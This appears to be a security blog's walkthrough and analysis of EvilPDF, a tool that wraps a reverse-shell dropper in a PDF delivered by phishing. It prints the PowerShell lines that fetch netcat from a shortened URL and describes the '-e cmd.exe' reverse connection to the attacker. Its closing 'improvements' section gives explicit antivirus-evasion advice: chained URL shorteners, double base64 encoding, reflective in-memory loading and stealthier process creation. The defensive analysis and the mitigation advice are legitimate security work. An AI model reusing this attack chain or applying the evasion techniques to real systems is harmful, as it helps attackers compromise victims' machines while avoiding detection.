EvilPDF Analysis - Jaymon Security


Description and installation of EvilPDF

In this article we study how EvilPDF works. Its GitHub repository describes it as a tool for embedding an executable file in a PDF document, although, as the analysis will show, that is not the most accurate description. The tool is available at:

https://github.com/JAYMONSECURITY/evilpdf

As we can see below, the project consists of several files, the most important of which are the following:

“adobe.pdf”: used as default PDF file.
“source.c”: this is the source code of the malware that will be embedded in the PDF file.
“template.html”: this is the website that will be visited to call the malware auto-download.
“evilpdf.py”: this is the main file from which all the parameters will be configured to obtain the final PDF file with the embedded executable.

The first step is to follow the repository’s instructions to download “evilPDF” on our Kali Linux machine, install the components it needs, and run it to confirm that it works.

As we can see, we have installed the tool correctly and can now run it without any problems.

Configuration and study

Before running and configuring the tool to obtain the final PDF with the “embedded malicious executable”, let’s look at the files currently in the directory. This matters because, after the tool has run, we will be able to see which new files were created, and we will study them.

With the files noted, we check our IP address, which we will need when configuring the tool.

Now we can proceed to launch and configure the tool as follows, using the default values for this PoC.

As the image above shows, for this proof of concept (PoC) we used the default PDF “adobe.pdf” that ships with the repository. By default the malicious executable is named “getadobe”; it is produced by compiling the “source.c” file with the parameters entered here. In LHOST we entered the IP address of our attacking machine, which is where the reverse shell from the victim machine will be received. We chose port 80 (HTTP) for the reverse connection because firewalls normally leave it open, which raises the chance that the connection from the victim machine succeeds. For the URL opened after the malicious PDF is executed, we kept the default: the official Adobe website.

Once all the parameters have been set, the tool builds the malware by compiling the “source.c” file, which we will examine later. It then converts the compiled binary (exe) to base64 so that it can be embedded in “page.html”. Finally, “page.html” (with the malicious binary embedded in its source code) is embedded in the PDF file, and at this point the malicious PDF has been created. Next, the PDF file (“adobe.pdf”) is compressed into a “zip” archive, and the archive is converted to base64 and embedded in “index.html”, using “template.html” as a template. Once this is done, the tool listens on port 80 to receive the command shell from the victim machine after the user has executed the malicious PDF.

Here we can see the new files mentioned above, created when the tool was launched. While it runs, the tool also creates intermediate files that are deleted once they have served their purpose: the source file “rc.c”, which is “source.c” with the IP and PORT parameters set by the user, and the binary “getadobe.exe”, which is the result of compiling “rc.c”.

It is always a good practice to check that the port where we should receive the reverse connection from the victim is waiting for the connection in “listening” mode:

Execution and study of EvilPDF

At this point we can either hand the malicious PDF to the victim directly on a storage device, or build a social-engineering attack vector: a phishing message in which the victim clicks a button linking to the attacking web server, which is set up to download the malware automatically. For the second option, the attacking machine has to act as a web server so that the victim can connect to it and download the malware.

To do this, just run the command that the tool itself prints when it launches the “listener”, as shown below. The command must be run from the directory that contains the generated malware, because the web server uses that directory as its root and the malware has to be reachable from outside. When “http://192.168.222.128:3333” is visited, the request appears in the server output (framed in blue). We will see later what happens when this URL is visited, together with a brief look at the network capture in Wireshark.

As a good practice, we check that port 3333 is listening:
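As a hedged illustration of this kind of check, the following Python sketch tests whether a TCP port accepts connections. The function name `is_listening` is an assumption made for this example and is not part of the tool; a terminal command such as netstat serves the same purpose.

```python
import socket


def is_listening(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        # connect_ex returns 0 on success instead of raising an exception
        return sock.connect_ex((host, port)) == 0
```

An active probe like this is fine for a web server, but a single-connection netcat listener may exit after the probe disconnects, so for the port 80 listener a passive check of the socket table is the safer choice.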

Now let’s imagine that we carry out a phishing attack and the victim, on receiving the email, clicks the “decoy” button, which makes their browser send an HTTP GET request to “http://192.168.222.128:3333”. On visiting the site, the first thing we see is a dialog offering to download a “zip” archive; depending on the browser, the file may even be downloaded directly without any prompt.

And in a matter of milliseconds, almost imperceptibly, it redirects to the official Adobe website so that the victim thinks it is a legitimate download.

Once the victim has downloaded the compressed file, we can see that when decompressing it, a PDF file is obtained.

When we open that PDF file, we are warned that it contains a file called “page.html” that may be malicious. We proceed to open it and see what happens next.

Having agreed to open “page.html” from the PDF, we see that a URL opens in our browser and takes us straight to the automatic download of a binary called “getadobe.exe”. We save it in our download directory, as shown below. Note that after the download of the binary embedded in “page.html” is triggered, the official Adobe website is loaded again.

Once it is saved, we execute it and receive the victim machine’s command shell on port 80 of our attacking machine.

The objective has been met without incident.

Detailed study of the source code

We will now go on to study the source code of the tool in more detail.

a) Analyzing the main script “evilpdf.py”.

Let’s start with the analysis of “evilpdf.py”, written in Python. It is the main executor. As we can see below, it consists of several modules.

First of all, the script checks whether the tools required by the different modules of evilPDF are installed on the system. These tools are “base64” (to encode files so they can be embedded in HTML pages), “zip” (to compress files), “nc” (to listen on the port where the victim’s command shell will be received), “php” (to start the web server that the victim will connect to in order to download the malware automatically), and “i686-w64-mingw32-cc” (a C cross-compiler for Windows; the “i686” prefix means that it produces 32-bit executables, which also run on 64-bit Windows).

In addition, the final part of the previous image shows the function that opens “adobe.pdf” in binary read mode (“rb”) and uses “PdfFileWriter” to write the output PDF, which is how “page.html” gets embedded in the document.

In the following image we can see the system call that compiles the “rc.c” file, which is the “source.c” file with the port (payload_port) and attacker IP address (payload_server) placeholders filled in. The output of the compilation is named “getadobe.exe” by default, a name held in the variable “payload_name”. The result is the malicious Windows binary (32-bit, given the “i686” compiler target, and therefore also runnable on 64-bit Windows), which runs a reverse shell on the victim machine and hands control of its command shell to the attacker.
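A dependency check of this kind can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the tool names come from the text above, while `REQUIRED_TOOLS` and `missing_tools` are hypothetical names, and the real script may perform the check differently.

```python
import shutil

# Tool names as listed in the analysis; the list itself is an assumption
REQUIRED_TOOLS = ["base64", "zip", "nc", "php", "i686-w64-mingw32-cc"]


def missing_tools(tools):
    """Return the tools that cannot be found on PATH."""
    return [name for name in tools if shutil.which(name) is None]


if __name__ == "__main__":
    missing = missing_tools(REQUIRED_TOOLS)
    print("missing:", missing if missing else "none")
```

`shutil.which` only confirms that an executable with that name is on PATH; it says nothing about its version or whether it behaves as expected.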

Once the malicious binary is obtained, we see how it is converted to base64 and saved in the “b64” file, and then embedded in the html code of the “page.html” file.

After the first “if” there is an “else” branch: if the configuration parameters point to an already compiled malware (exe) located in a different path, the script skips compilation and goes straight to converting it to base64 for further processing.

In the last part of the image we can see how it embeds the base64 binary in the “page.html” file, using the “template.html” file for the substitution of internal parameters by using the “sed” command.

In another part of the function, we see how after the malicious PDF with embedded “page.html” is created, it is compressed into a “zip” file, and then this compressed file is converted to base64, saving the result in the “b64” file. Finally, the content of this last file is embedded in “index.html”. We can see how, through the “sed” command, a specific text is replaced by another one in the “template.html” file, and the result is saved in a new file called “index.html”.

“b64” file with the “adobe.zip” file converted to base64.

In the following image we can see that the “nc” tool is used to listen on the port (80) defined earlier in the parameters and held in the “payload_port” variable, in order to receive the reverse shell when the victim executes the malicious PDF.

b) Analyzing the files “source.c”, “rc.c”, “b.ps1” and “a.exe”.

These four files will be analyzed in the same section because they all share the same root: “source.c”.

Next we look at the content of the “source.c” file. It is very simple C code intended to run on Windows systems. It only calls the “system()” function, which belongs to the C standard library (declared in “stdlib.h”) rather than to “windows.h”, and which produces the same result as typing the commands directly in the system terminal (“cmd.exe”).

First, it creates the “temp” directory in the root of the victim’s Windows system drive (“c:\”). Once the directory exists, it creates the file “b.ps1” with the following content:

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

(wget ‘https://tinyurl.com/y88r9epk’ -OutFile c:\temp\a.exe)

Once the “b.ps1” file has been created, it is executed with “powershell”. The script downloads the executable “a.exe” to the “c:\temp\” directory on the victim machine. The executable is then launched with the “start /MIN” command (so that it runs in a minimized window and is less likely to be noticed by the victim), passing it “payload_server” (the IP 192.168.222.128 of the attacking machine), “payload_port” (port 80, listening on the attacking machine), and the “-e cmd.exe -d” flags. We conclude that “a.exe” is really “netcat” under a different name: it simply connects to port 80 of the attacking machine and hands over the victim machine’s command shell (“cmd.exe”). This is discussed further below.

Source code of “rc.c”, same as “source.c” but with IP and port parameters already set.

After disassembling the binary “getadobe.exe”, the product of compiling the “rc.c” file, the instructions described above are clearly visible.

In the following image we can see the creation of the “temp” directory and the “b.ps1” file, and the download via the “wget” command of the “a.exe” binary, which is “netcat”. Note that “a.exe” is downloaded over HTTPS: because the transfer is encrypted with TLS, antivirus or similar systems that inspect network traffic cannot see its content.

As a curiosity we can see the service used by the tool to mask the URL.

If we analyze the shortened URL, using the service provided by “getlinkinfo.com” to see the original URL, we see that the URL indeed points to the download from github of “nc.exe”.
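The same lookup can also be done locally, without a third-party service. The sketch below assumes that the shortener answers a HEAD request with an HTTP redirect; `resolve_one_hop` is a hypothetical helper name. Because the redirect is read but not followed, nothing is downloaded from the final destination.

```python
import http.client
from urllib.parse import urlsplit

REDIRECT_CODES = (301, 302, 303, 307, 308)


def resolve_one_hop(url: str, timeout: float = 5.0):
    """Return the Location header of a redirect response, or None."""
    parts = urlsplit(url)
    if parts.scheme == "https":
        conn = http.client.HTTPSConnection(parts.netloc, timeout=timeout)
    else:
        conn = http.client.HTTPConnection(parts.netloc, timeout=timeout)
    try:
        path = parts.path or "/"
        if parts.query:
            path += "?" + parts.query
        # HEAD asks for headers only, so no response body is transferred
        conn.request("HEAD", path)
        response = conn.getresponse()
        if response.status in REDIRECT_CODES:
            return response.getheader("Location")
        return None
    finally:
        conn.close()
```

A chain of several shorteners can be unwound by calling the function repeatedly on each returned URL until it returns None.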

Once “nc.exe” has been downloaded and saved in the “c:\temp” directory as “a.exe”, running it shows the same interface as “netcat”, and a quick scan on “virustotal.com” shows that several antivirus engines classify it as “netcat”.

c) Analyzing the “page.html” file.

Next we are going to see the source code of “page.html”. As we can see, it has an embedded executable file in base64. We know this because of the “magic numbers” corresponding in base64 to binary files (“TVqQAAMAAAAAAAAAAA//…”).
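To see why that prefix gives the file type away, it is enough to decode its first four characters. The short sketch below (the helper name `is_pe_base64` is an assumption for this example) shows that they decode to the bytes “MZ”, the signature at the start of every Windows executable.

```python
import base64


def is_pe_base64(text: str) -> bool:
    """Return True if base64 text decodes to data starting with b'MZ'."""
    # Four base64 characters always decode to exactly three bytes
    head = base64.b64decode(text[:4])
    return head.startswith(b"MZ")


print(base64.b64decode("TVqQ"))   # b'MZ\x90'
print(is_pe_base64("TVqQ"))       # True
```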

When “page.html” is opened, the embedded “getadobe.exe” binary is downloaded. After downloading, a redirection is made to the https://get.adobe.com/flashplayer/ website to hide the malicious activity.

d) Analyzing the “index.html” file.

Next we are going to see the source code of “index.html”. As we can see it has embedded in base64 a compressed “zip” file. We know this by the “magic numbers” corresponding in base64 to “zip” files (“UEsDBBQAAAAAAIAK5i…”).
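From a defender’s point of view, this observation can be turned into a simple check. The following sketch scans HTML text for long base64 runs and reports those whose decoded start matches a known signature. The 64-character threshold, the signature table and the function name are assumptions chosen for the example, not something taken from the tool.

```python
import base64
import re

# File signatures (magic numbers) mapped to a readable label
SIGNATURES = {
    b"MZ": "Windows executable (PE)",
    b"PK\x03\x04": "ZIP archive",
}

# Runs of at least 64 base64 characters; the threshold is arbitrary
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def classify_embedded_blobs(html: str):
    """Return (offset, label) for each base64 run with a known signature."""
    findings = []
    for match in B64_RUN.finditer(html):
        # 8 base64 characters decode to 6 bytes, enough for both signatures
        head = base64.b64decode(match.group(0)[:8])
        for magic, label in SIGNATURES.items():
            if head.startswith(magic):
                findings.append((match.start(), label))
    return findings
```

Run against the source of a page, it returns an empty list when no long base64 run starts with one of the listed signatures.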

In the same way as “page.html”, the self-downloading of the zip file is performed, and then the website is redirected to https://get.adobe.com/flashplayer/ to make the malicious activity go unnoticed. It is logical that both “page.html” and “index.html” execute actions in the same way, since both have been created from the “template.html” file.

e) Analyzing the “template.html” file.

As we can see below, this file is the basis for the two previous files studied: “page.html” and “index.html”. From this file the texts of “data_base64” and “payload_name” are replaced to create the aforementioned files.
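The substitution itself is plain text replacement. As a minimal sketch, assuming the two placeholders named above appear literally in the template, the effect of the “sed” calls can be reproduced as follows; `render_template` is a hypothetical name and the sample template is invented for the example.

```python
def render_template(template: str, data_base64: str, payload_name: str) -> str:
    """Replace the two literal placeholders, as chained sed calls would."""
    return (template
            .replace("data_base64", data_base64)
            .replace("payload_name", payload_name))


# Invented one-line template, only to show the effect of the replacement
sample = "name=payload_name;data=data_base64"
print(render_template(sample, "QUJD", "file.bin"))
# name=file.bin;data=QUJD
```

Since the base64 alphabet contains no underscore, the inserted data can never contain the text “payload_name”, so the order of the two replacements does not matter here.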

f) Static analysis of the “adobe.pdf” file.

After the execution of “evilpdf” we obtain the file “adobe.pdf”, which is undoubtedly the main executing engine that triggers, in a domino effect, the calls to the rest of the files generated by the tool, embedded in each other.

If we open the file “adobe.pdf” to read it in hexadecimal, we can see very interesting sections where the file “page.html” is embedded. We can also see that the execution of “page.html” is called by using JavaScript with the “OpenAction” instruction.
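A first-pass triage of such a file does not require reading the hex dump by hand. The sketch below counts a few PDF name keys that are commonly associated with active or embedded content. The key list and the function name are assumptions for this example, and the check is deliberately naive: it does not decode hex-escaped names or look inside compressed object streams.

```python
import re

# Name keys that often deserve a closer look; the selection is an assumption
SUSPICIOUS_KEYS = [b"/OpenAction", b"/JavaScript", b"/JS",
                   b"/EmbeddedFile", b"/Launch"]


def count_pdf_keywords(data: bytes) -> dict:
    """Count occurrences of each key in the raw bytes of a PDF."""
    counts = {}
    for key in SUSPICIOUS_KEYS:
        # The lookahead avoids counting a longer name that merely starts
        # with the key, e.g. /EmbeddedFiles when looking for /EmbeddedFile
        pattern = re.escape(key) + rb"(?![A-Za-z])"
        counts[key.decode()] = len(re.findall(pattern, data))
    return counts
```

To try it, read the file with `open(path, "rb").read()` and pass the bytes to the function; non-zero counts indicate only that the file deserves closer inspection.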

If we continue down the file, we find the base64 content embedded in “page.html”. First, in the green box, we see the function that redirects to the Adobe website. Then, in the final red box, we see the embedded binary, which its “magic numbers” identify as an executable, as seen previously. It is “getadobe.exe”.

If we continue until the end of the base64 characters, we can see that it is indeed “getadobe.exe”.

Summary: overall view of the analysis

At this point, we already have our global visualization of how the malware assembly performed by the tool works. Graphically we could describe it with the following image:

So we can say that:

“index.html”: contains “adobe.zip” embedded. It is downloaded as soon as the victim visits “http://192.168.222.128:3333”.
“adobe.zip”: contains “adobe.pdf”. It is extracted manually by the victim user.
“adobe.pdf”: contains “page.html”, which is executed when “adobe.pdf” is opened.
“page.html”: contains “getadobe.exe” embedded. When “page.html” is opened, it calls the download of “getadobe.exe”.
“getadobe.exe”: when executed, it creates the file “b.ps1”. Once created, it is executed with powershell.
“b.ps1”: when executed, proceeds to download the file “a.exe” from https://tinyurl.com/y88r9epk.
“a.exe”: this is “netcat”, which is used to perform the reverse connection to the attacking machine by giving the attacker the command shell of the victim machine.
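The list above can also be written down as a small data structure, which makes the nesting easy to check. This is purely a descriptive model of the chain, with names chosen for the example; it does not perform any of the steps.

```python
# Each entry: (artifact, what it delivers, what triggers the delivery)
CHAIN = [
    ("index.html", "adobe.zip", "victim visits the attacker's web server"),
    ("adobe.zip", "adobe.pdf", "victim extracts the archive manually"),
    ("adobe.pdf", "page.html", "victim opens the PDF"),
    ("page.html", "getadobe.exe", "page.html is opened in the browser"),
    ("getadobe.exe", "b.ps1", "victim runs the executable"),
    ("b.ps1", "a.exe", "PowerShell runs the script"),
]


def is_linked(chain) -> bool:
    """Check that every stage delivers exactly the next stage's artifact."""
    return all(chain[i][1] == chain[i + 1][0] for i in range(len(chain) - 1))


for depth, (artifact, delivers, trigger) in enumerate(CHAIN):
    print("  " * depth + f"{artifact} -> {delivers} ({trigger})")
```

Printed this way, the chain shows six stages before “a.exe” finally opens the reverse connection.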

Network traffic analysis with Wireshark

a) Network traffic during the delivery phase.

We are now going to study only the network traffic generated when the victim clicks on the button of the phishing email sent by the attacker, deceiving the victim with social engineering.

Clicking the button leads to the link http://192.168.222.128:3333. At this point the victim’s browser loads and runs the “index.html” file studied above.

As we can see in the following image, the web code is perfectly readable since it does not present any type of encryption. In this code we can see how the victim downloads the compressed file “adobe.zip”, embedded in base64 in “index.html”. And then the web is redirected via the “location.replace” instruction to https://get.adobe.com/flashplayer/.

We will not study network traffic for “page.html”: it is embedded in the “adobe.pdf” file, which is already on the victim machine, so the download it triggers is understood not to generate network traffic outside the victim machine (localhost).

Nor will we study the traffic generated when “b.ps1” downloads the executable “nc.exe” from GitHub: that traffic is encrypted over HTTPS, and the action it performs is already clear.

b) Network traffic during the operation phase.

We are now at the exploitation stage, i.e. the attacker has already received the command shell from the victim machine and proceeds to execute remote commands.

As the following image shows, all the commands sent by the attacker and all the information returned by the victim machine travel over the network in clear text. This matters because any other attacker on the same network could capture confidential information through a Man-in-the-Middle (MITM) attack.
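The fact that the session is unencrypted also helps the defender, because the content of the shell can be matched directly. As a rough sketch, assuming the TCP payload bytes have already been extracted from a capture and that the victim runs an English-language Windows, a check for the banner that “cmd.exe” prints at startup could look like this (the marker list and function name are assumptions):

```python
# Text fragments from the banner printed when cmd.exe starts
CMD_MARKERS = (b"Microsoft Windows [Version", b"Microsoft Corporation")


def looks_like_cleartext_cmd(payload: bytes) -> bool:
    """Return True if the payload contains a cmd.exe banner fragment."""
    return any(marker in payload for marker in CMD_MARKERS)
```

A match on outbound traffic to port 80 that is not HTTP is a strong hint of a raw reverse shell; with an encrypted channel this kind of content match is no longer possible.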

To prevent traffic from traveling in the clear, while maintaining the same connection functionalities as “netcat”, the easiest solution would be to use “cryptcat”, since with “cryptcat” the information travels encrypted over the network.

Curiosities and considerations

a) “Evilpdf” armed with meterpreter.

Someone may have wondered: why settle for a conventional command shell? Couldn’t the PDF file be built with an executable that delivers a reverse “meterpreter” shell?

Actually, the quick answer I can think of is that a conventional shell like the one provided by “evilpdf” with “netcat” is more than enough to upgrade it to a “meterpreter” type shell. We will only have to prepare the scenario to receive the shell in Metasploit through “exploit/multi/handler” configured with the payload “windows/x64/shell/reverse_tcp”.

Once the command shell has been received from the victim machine, in order to elevate it to “meterpreter” it would be enough, in most cases, to launch the command “sessions -u “. In this way we would already have a meterpreter shell with which to take advantage of the full potential of the post-exploitation modules offered by Metasploit.

However, let’s assume that even knowing the above, we want to mount the malicious PDF with a reverse meterpreter binary. A quick example to mount our own reverse meterpreter malware with “msfvenom” would be as follows:

Once we have this malware prepared, it would be as easy as putting its path in the right parameter of “evilpdf”, and it will automatically perform the necessary instructions to embed it in the final PDF file.

Note that if we use this msfvenom-built malware, which gives us a reverse meterpreter shell from the victim machine, the automatic “netcat” listener started by “evilpdf” is of no use. To receive the meterpreter session correctly we have to configure Metasploit’s “exploit/multi/handler” with the payload “windows/x64/meterpreter/reverse_tcp”, matching the parameters given to “msfvenom” when the malware was created.

b) “Evilpdf” has code disabled.

As a curiosity, in the source code of “evilpdf.py” we find a function that is disabled:

It is curious to see how it makes use of the service provided by “serveo.net” by creating a connection tunnel through “ssh” with “TCP forwarding”. More information on how serveo works can be found on its own web page http://serveo.net.

We can also see how it raises a web server on the attacking machine (localhost) on port 3333, using “php”. Once this is done, we can see that it proceeds to obtain a connection link to “serveo.net”, and then obfuscates it using the “bitly.com” link shortener service.

Conclusions and recommendations

Throughout the analysis we have been able to see how easy it is nowadays to assemble malicious PDF files automatically, without the need for the attacker to have any advanced computer knowledge. The tool itself is responsible for assembling the malware, embedding it in the PDF file, and finally setting the stage to take control of those machines that execute the malicious file.

Clearly, the main objective of this tool is to execute malware on a victim machine while bypassing its security controls. On first contact, the PDF file does this well. Naturally it is not FUD (fully undetectable): it carries a base64-encoded executable in its source, and it would be strange if no antivirus engine on the market noticed those “magic numbers”. Even so, “on first contact” it evades a large number of current antivirus engines.

I emphasize “on first contact” because after the execution of the PDF, which may go unnoticed by antivirus systems, several system calls and external malware downloads are triggered, which are fully detectable by many antivirus systems.

There are two main types of attack vectors that can be used to spread this type of malware: social engineering (phishing…) and removable media (USB…).

The recommendations to avoid becoming a victim of such an attack are not very different from the more conventional ones, such as keeping systems updated and well patched, having a legitimate antivirus installed and updated, and having good training in cybersecurity awareness.

In fact, in a business environment where all systems are updated, patched and properly protected by an antivirus, this malicious PDF should not get past the first filter. A raw download of an executable that touches disk, carries no valid digital signature, and immediately opens a direct connection to another machine without user permission is more than enough to flag suspicious behavior and interrupt the operation of the malicious file.

I am not going to explain in this article how we could obtain a FUD operation by using this tool, because it is not the objective of this study. However, it is to the author’s credit that “evilpdf”, with certain modifications, opens the door to be able to perform Red Team operations with very powerful social engineering vectors, for which his work and effort is to be thanked.

Proposed improvements for EvilPDF

To serve as constructive criticism to the author of “EvilPDF”, whom I thank and acknowledge for his work, I believe that the following modifications could substantially improve the tool:

Source code of the “source.c” file

The use of the “system()” function: it generates a system call that does not go unnoticed by security controls. In addition, the action is duplicated by using this function and then launching the command “cmd.exe /c …” with arguments. This type of execution (“cmd.exe /c”) leaves the flow of the parent process and creates new processes in the system (such as “cmd.exe”) that trigger alarms in detection systems. Within the same “cmd.exe /c” instruction the “start” command is also executed, although in practice the two do the same job. A simple test is to run “cmd /c calc.exe” and “start calc.exe” from the command prompt (“cmd.exe”): both give the same result. Just as “cmd.exe /c …” creates a new process, so does the “start” command. That is why the author of the tool has been cautious and added the “/MIN” flag, so that execution via “start” happens minimized and goes unnoticed by the victim. In short, to be more evasive, instead of the “system()” function I think it is better to use the “ShellExecute()” or “WinExec()” functions.

Create “temp” directory in “C:\”: the directory is created using the command “mkdir c:\temp”. First of all, creating a directory that did not previously exist has several disadvantages: it leaves a trace on the system, and antivirus systems constantly monitor this behavior and treat it as suspicious when it does not come from legitimate software with a valid digital signature. Another issue is that the directory is forced onto the “C:\” drive, but what if the user has changed the drive letter? Then the “C:\” drive would not be found and the “temp” directory could not be created. My recommendation, to avoid detection for creating directories in a predefined root drive, is to work directly in the temporary directory defined in the system variable “%TEMP%”, which points to the right directory on the right drive. This also ensures that the victim user has write privileges in that directory and can create files without any problems.

The URL “tinyurl.com/y88r9epk”: it is very easy to detect the original URL. I recommend using “a URL shortener over a different URL shortener”, a minimum of two times to obfuscate the URL better, and make it more difficult to parse.

The use of Powershell: it is necessary to download the file via HTTPS. However, bear in mind that nowadays in many Organizations its use is very restricted and even disabled for users without administrative privileges, so that a user with “normal” privileges could not use it. In addition, AV systems (AMSI…) constantly monitor the use of Powershell to prevent the execution of in-memory malware, which make incoming and outgoing connections to the victim system from remote command and control (C2) systems, such as “Empire” and others. My recommendation is not to download a full executable, but to embed it as well as the rest of the files; or else, download the executable (exe, dll…) as a text file in “double or triple base64” to avoid the “magic numbers”. Once downloaded to disk, run it in memory by reflection to avoid detections.

Launching of script “b.ps1”: the execution of Powershell scripts is not always successful, due to different system measures in reference to the “ExecutionPolicy”. It is preferable to launch the script instructions in a single line from the “cmd”. This will also avoid creating the “b.ps1” file on the system, which leads to possible detections.

General aspects

When embedding base64 files, we have seen that their “magic numbers” are very easily detectable. That is why I recommend converting each embedded file to base64 at least twice, to avoid further detections. Be aware that each conversion to base64 increases the size by roughly one third (four output characters for every three input bytes), and this must be taken into account if you want to run binaries in memory, since the “buffer” does not have infinite space and the program “crashes”.
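The size cost of repeated encoding is easy to verify. The sketch below, with function names chosen for the example, encodes a dummy buffer several times and reports the length after each round. It also shows a side effect worth knowing on the detection side: a second round of base64 maps the fixed “TVq…” prefix to another fixed prefix.

```python
import base64


def encoded_sizes(raw_len: int, rounds: int):
    """Return the length after each successive base64 encoding round."""
    data = bytes(raw_len)            # dummy content, only the size matters
    sizes = []
    for _ in range(rounds):
        data = base64.b64encode(data)
        sizes.append(len(data))
    return sizes


def double_encoded_prefix(raw: bytes) -> bytes:
    """Return the first four characters after two base64 rounds."""
    return base64.b64encode(base64.b64encode(raw))[:4]


print(encoded_sizes(300, 2))                              # [400, 536]
print(double_encoded_prefix(b"MZ\x90\x00\x03\x00"))       # b'VFZx'
```

Each round multiplies the size by about 4/3, so two rounds cost roughly 78% extra rather than a fourfold increase, and a signature for the double-encoded form can be derived in exactly the same way as for the single-encoded one.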

Network traffic

By using “netcat” as a Trojan to obtain the reverse shell of the victim machine, we see how all network traffic between the victim and the attacker, in a bidirectional manner, travels in clear text. Needless to say the dangers involved. This is why I recommend changing the use of “netcat” to “cryptcat” or “ncat” with SSL. My next article will be on the use and study of these three tools so that their differences can be clearly seen.
